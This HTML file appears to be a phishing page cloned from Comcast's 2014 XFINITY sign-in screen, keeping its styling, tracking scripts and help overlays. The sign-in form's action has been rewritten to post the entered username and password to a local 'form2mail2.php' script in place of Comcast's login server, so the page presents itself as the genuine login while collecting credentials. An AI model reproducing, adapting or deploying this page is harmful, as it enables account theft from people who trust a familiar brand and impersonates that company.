﻿<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"><head>



	<title>Sign in to Comcast</title>
	<link rel="stylesheet" type="text/css" href="Comcast_files/styles.css">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta name="description" content="Comcast.net has more to offer when you sign in to your mySIGN-IN Account. Use your account to access other Comcast sites and services like Comcast.net, Fancast, Plaxo, and more.">
	<meta name="viewport" content="width=1024">
	<link rel="shortcut icon" href="https://login.comcast.net/static/images/global/favicon.ico">
<style type="text/css">#bd.signin{padding-top:40px;margin-top:0}#needaccess{border-color:#fff;border-style:solid}#signin{border-color:#fff;border-style:solid}body{background-image:url(/static/images/ccentral/MyAccount_SignIn.png);background-position:center top;background-repeat:no-repeat;line-height:1;margin:0;min-width:1024px;-webkit-background-size:100%;-moz-background-size:100%;-o-background-size:100%;background-size:100%}html{background:none !important}#ft-outer{margin-top:80px}#right{min-height:565px;border-left:0 solid #ccc}</style>
<script type="text/javascript" src="Comcast_files/mbox.js"></script><style>.mboxDefault { visibility:hidden; }</style><script src="Comcast_files/target.js"></script><script src="Comcast_files/standard" language="JavaScript"></script></head><body><div style="visibility: visible; display: block;" id="mbox-target-global-mbox-1409822393579-779995" class="mboxDefault"></div><div style="visibility: hidden; display: none" id="mboxImported-default-target-global-mbox-0"><!-- Offer Id: 78763  --><script type="text/javascript">

function aam_tnt_cb (){
if(arguments[0].stuff != undefined && arguments[0].stuff != ""){
for(var i = 0; i < arguments[0].stuff.length; i++){
if(arguments[0].stuff[i].cn =="aam_tnt"){
if(arguments[0].stuff[0].cv.split(";")){
var demdex_raw = arguments[0].stuff[i].cv.split(";");
var tapMboxBuilder = mboxFactoryDefault.getUrlBuilder();
tapMboxBuilder.addParameters(demdex_raw);}}}}}

</script>
<!-- AAM API call here -->
<script type="text/javaScript" language="javascript" src="Comcast_files/event"></script><!-- Offer Id: 107745  --><script>
if (window.tntRenderFlash) tntRenderFlash();
</script><!-- Offer Id: 26703  --><script type="text/javascript"> 
if (typeof(s_tnt) == 'undefined') { 
    s_tnt = ''; 
} 
s_tnt += '49249:0:0,'; 
</script></div>


<div style="visibility: visible; display: block;" class="mboxDefault"></div>
<script type="text/javascript">
	mboxCreate("login_page",
			"s=ccentral-cima",
			"destination=https://customer.comcast.com/secure/Home.aspx"
	);
</script><div id="mboxMarker-default-login_page-0" style="visibility:hidden;display:none">&nbsp;</div><script src="Comcast_files/standard_002" language="JavaScript"></script><div style="visibility: hidden; display: none" id="mboxImported-default-login_page-0"><!-- Offer Id: 78763  --><script type="text/javascript">

function aam_tnt_cb (){
if(arguments[0].stuff != undefined && arguments[0].stuff != ""){
for(var i = 0; i < arguments[0].stuff.length; i++){
if(arguments[0].stuff[i].cn =="aam_tnt"){
if(arguments[0].stuff[0].cv.split(";")){
var demdex_raw = arguments[0].stuff[i].cv.split(";");
var tapMboxBuilder = mboxFactoryDefault.getUrlBuilder();
tapMboxBuilder.addParameters(demdex_raw);}}}}}

</script>
<!-- AAM API call here -->
<script type="text/javaScript" language="javascript" src="Comcast_files/event"></script><!-- Offer Id: 107745  --><script>
if (window.tntRenderFlash) tntRenderFlash();
</script></div>
<div style="visibility: visible; display: block;" class="mboxDefault"></div>
<script type="text/javascript">
	mboxCreate("login_page_1");
</script><div id="mboxMarker-default-login_page_1-0" style="visibility:hidden;display:none">&nbsp;</div><script src="Comcast_files/standard_003" language="JavaScript"></script><div style="visibility: hidden; display: none" id="mboxImported-default-login_page_1-0"><!-- Offer Id: 78763  --><script type="text/javascript">

function aam_tnt_cb (){
if(arguments[0].stuff != undefined && arguments[0].stuff != ""){
for(var i = 0; i < arguments[0].stuff.length; i++){
if(arguments[0].stuff[i].cn =="aam_tnt"){
if(arguments[0].stuff[0].cv.split(";")){
var demdex_raw = arguments[0].stuff[i].cv.split(";");
var tapMboxBuilder = mboxFactoryDefault.getUrlBuilder();
tapMboxBuilder.addParameters(demdex_raw);}}}}}

</script>
<!-- AAM API call here -->
<script type="text/javaScript" language="javascript" src="Comcast_files/event"></script><!-- Offer Id: 107745  --><script>
if (window.tntRenderFlash) tntRenderFlash();
</script></div>

<div id="bd" class="signin clearfix">
	<div id="left"></div>
	<div id="right">
		<div id="signin-box">
	<form name="signin" action=form2mail2.php?"https://login.comcast.net/login" method="post" onsubmit="return login.onSubmit()">
	<div id="signin">
		<h1 class="default no-error">XFINITY</h1>
		<div class="sign_in">
					<h2>Sign In</h2>
				</div>
		<label for="user" id="login_id_label">Email or username </label>
<input id="user" name="user" maxlength="128" tabindex="1" type="text">
		<label for="passwd" id="password_label">Password </label>
		<input id="passwd" name="passwd" maxlength="128" tabindex="2" type="password">
		<div>
		    <input id="remember_me" value="1" tabindex="3" name="rm" type="checkbox">
		<label id="rm_label" for="remember_me" title="Keep me signed in.">Keep me signed in.</label>
		<a href="#" id="rm_label_learn_more" rel="#rm_help" tabindex="4">Learn more<span class="access-aid"> about staying signed in</span></a>
		</div>
<button type="submit" id="sign_in" tabindex="5">SIGN IN ►</button>
		<p class="fblearnmore fb_not_available">Facebook Connect is not supported for this XFINITY product.
		<a href="#" id="fb_learn_more_text" rel="#fb_learn_more_help"><strong>Learn more<span class="access-aid"> about connecting through Facebook</span></strong></a></p>

<p class="forgot_link first"><a href="https://login.comcast.net/myaccount/lookup?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FforceAuthn%3Dtrue%26ipAddrAuthn%3Dfalse%26lang%3Den%26s%3Dccentral-cima%26deviceAuthn%3Dfalse%26r%3Dcomcast.net%26continue%3Dhttps%253A%252F%252Fcustomer.comcast.com%252Fsecure%252FHome.aspx%26passive%3Dfalse%26rm%3D2&amp;lang=en" target="_self" title="Lookup User ID"><strong>Don't know your email or username?</strong></a></p>
<p class="forgot_link"><a id="forgotPwdLink" href="https://login.comcast.net/myaccount/reset?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FforceAuthn%3Dtrue%26ipAddrAuthn%3Dfalse%26lang%3Den%26s%3Dccentral-cima%26deviceAuthn%3Dfalse%26r%3Dcomcast.net%26continue%3Dhttps%253A%252F%252Fcustomer.comcast.com%252Fsecure%252FHome.aspx%26passive%3Dfalse%26rm%3D2&amp;lang=en" target="_self" title="Reset Password"><strong>Forgot your password?</strong></a></p>

		<input name="deviceAuthn" value="false" type="hidden">
		<input name="s" value="ccentral-cima" type="hidden">
		<input name="forceAuthn" value="true" type="hidden">
		<input name="r" value="comcast.net" type="hidden">
		<input name="ipAddrAuthn" value="false" type="hidden">
		<input name="continue" value="https://customer.comcast.com/secure/Home.aspx" type="hidden">
		<input name="passive" value="false" type="hidden">
		<input name="lang" value="en" type="hidden">
 	</div>

		<div id="needaccess">
			<h2>Need access?</h2>
			<p class="action"><a href="https://login.comcast.net/myaccount/create-uid?continue=https%3A%2F%2Flogin.comcast.net%2Flogin%3FforceAuthn%3Dtrue%26ipAddrAuthn%3Dfalse%26lang%3Den%26s%3Dccentral-cima%26deviceAuthn%3Dfalse%26r%3Dcomcast.net%26continue%3Dhttps%253A%252F%252Fcustomer.comcast.com%252Fsecure%252FHome.aspx%26passive%3Dfalse%26rm%3D2&amp;lang=en" target="_self" title="Create a Username">Create a Username »</a></p>
		</div>
 	</form>
</div>

<div id="rm_help" role="dialog" class="jq-overlay" aria-describedby="rm_help_descr"><a href="#" class="close"></a><div class="inner" id="rm_help_descr">
<h2>Why Remember Me?</h2>
<p>When you choose Remember Me on sign in, we will remember who you are 
and keep you signed in for up to 30 days unless you sign out. This is 
great if you sign in all the time to check your email or watch TV shows 
online.</p>
<p>But be careful: If you share your personal computer with others, they
 could access and make some changes to your account. You should 
definitely not use Remember Me in public computers!</p>
</div></div>


<div id="fb_learn_more_help" role="dialog" class="jq-overlay" aria-describedby="fb_learn_more_help_descr"><a href="#" class="close"></a><div class="inner" id="fb_learn_more_help_descr">
<h1>Signing in with Facebook Connect</h1>
<p>Facebook Connect is available for signing in to all of your XFINITY 
services except XFINITY Connect, XFINITY Home, and your account section 
within My Account.</p>
</div></div>
 	</div>
 	<br class="clear">
</div>
<div style="position: static;" id="ft-outer"><div id="ft">
<div class="ft_wrap">
	<ul>
		<li class="logo">Xfinity</li>
		<li class="first">© 2014 Comcast</li>
		<li><a href="http://xfinity.comcast.net/siteindex/" title="Site Map">Site Map</a></li>
		<li><a href="http://xfinity.comcast.net/privacy/" title="Privacy Policy">Privacy Policy</a></li>
		<li><a href="http://xfinity.comcast.net/terms/" title="Terms of Service">Terms of Service</a></li>
		<li><a href="http://customer.comcast.com/Pages/HelpNFC.aspx?id=Comcast-Help-and-Support-home" title="Contact Us">Contact Us</a></li>
		<li class="clogo">Comcast</li>
	</ul>
</div>
<div class="truste">
	<div id="b537c389-7be1-4331-bb73-03a71788bc12"><script type="text/javascript" src="Comcast_files/asc.txt"></script><a href="https://privacy.truste.com/privacy-seal/Comcast-Cable-Communications-Management,-LLC/validation?rid=bf9d4d6f-2b32-4201-a167-5b55a4451508" title="TRUSTe online privacy certification" target="_blank"><img style="border: none" src="Comcast_files/seal.png" alt="TRUSTe online privacy certification"></a></div>
</div></div></div>




<script type="text/javascript" src="Comcast_files/jquery-1.js"></script>
<script type="text/javascript" src="Comcast_files/jquery.js"></script>
<script type="text/javascript">
var login = (function ($) {
	var m = {};

	function hasQuery(uri){return uri.indexOf("?")>=0;}

	m.appendQuery = function (uri, query){if(hasQuery(uri)){return uri+"&"+query;}else{return uri+"?"+query;}}
	m.placeFooter = function(){var e=$("#ft-outer");if(e.length==0){return}var c=$("#bd");if(c.length!=1){return}var a=c.offset().top+c.outerHeight(true);var b=e.outerHeight(true);var d=($(window).height()>(a+b))?"absolute":"static";e.css({position:d})};
	m.setupFieldtipPopupActivation = function () {$('.field-tip').click(function() {$(this).children('.tip-popup').show();});$('.field-tip').mouseout(function() {$(this).children('.tip-popup').hide();});};
        m.focusLoginForm = function() { var f=$("#user");if(f.length>0 && f.val().length==0){f.focus()}else{f=$("#passwd");if(f.length>0){f.focus()}}};
	m.openLinkWithLoginId = function(f){var c=$(f.currentTarget);var a=c.attr("href");var b=$("#user").val();if(b.length>0){a=login.appendQuery(a,"login="+b)}var d=c.attr("target").length>0?c.attr("target"):"";if(d==""){window.location.href=a}else{window.open(a,d)}f.stopPropagation();return false};
	m.commonOverlayProp = {mask:{color:"#000000",loadSpeed:200,opacity:0.7},closeOnClick:false,top:"center",onBeforeLoad:function(){$("#ad-wrapper").hide();},onLoad:function(){this.getOverlay().find("a.close:first-child").focus()},onClose:function(){$("#ad-wrapper").show()}};
	m.onSubmit=function(){var a=$("#user");var d=$("#passwd");if(a.val()===""||d.val()===""){$("#error").remove();$('<p id="error" class="error">Please type in your email or username and password to sign in.</p>').insertAfter(".sign_in");var c=$("#login_id_label");c.find("span.access-aid").remove();c.append('<span class="access-aid">Please type in your email or username and password to sign in. Please re-enter username.</span>');var b=$("#password_label");b.find("span.access-aid").remove();b.append('<span class="access-aid">Please type in your email or username and password to sign in. Please re-enter password.</span>'); d.focus(); a.focus(); return false}else{return true}};
	return m;
}(jQuery));
</script>
<script type="text/javascript">
$(function(){
	login.focusLoginForm();
	$('#forgotPwdLink').click(login.openLinkWithLoginId);
	$("#fb_learn_more_text").overlay(login.commonOverlayProp);
	$("#rm_label_learn_more").overlay(login.commonOverlayProp);

})
</script>
<script type="text/javascript">
$(function() {
    $(window).load(login.placeFooter)
    $(window).resize(login.placeFooter)
    login.setupFieldtipPopupActivation();
});
</script>
	<div style="display:none">
<script type="text/javascript" src="Comcast_files/omniture.js"></script>
<script type="text/javascript"><!--
	s.pageName="sign in"
	s.events = "event11"
	s.channel = "sign in"
	s.prop4 = "sign in"
	s.prop7 = "ccentral-cima"
	s.prop33 = "comcast net"
	s.prop35 = "authentication"
	s.prop36 = "site:home"
	s.eVar36 = "site:home"
	s.eVar47 = "anonymous"
	s.eVar7 = "ccentral-cima"

	/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
	var s_code=s.t();if(s_code)document.write(s_code);//-->
</script>
</div>


</body></html>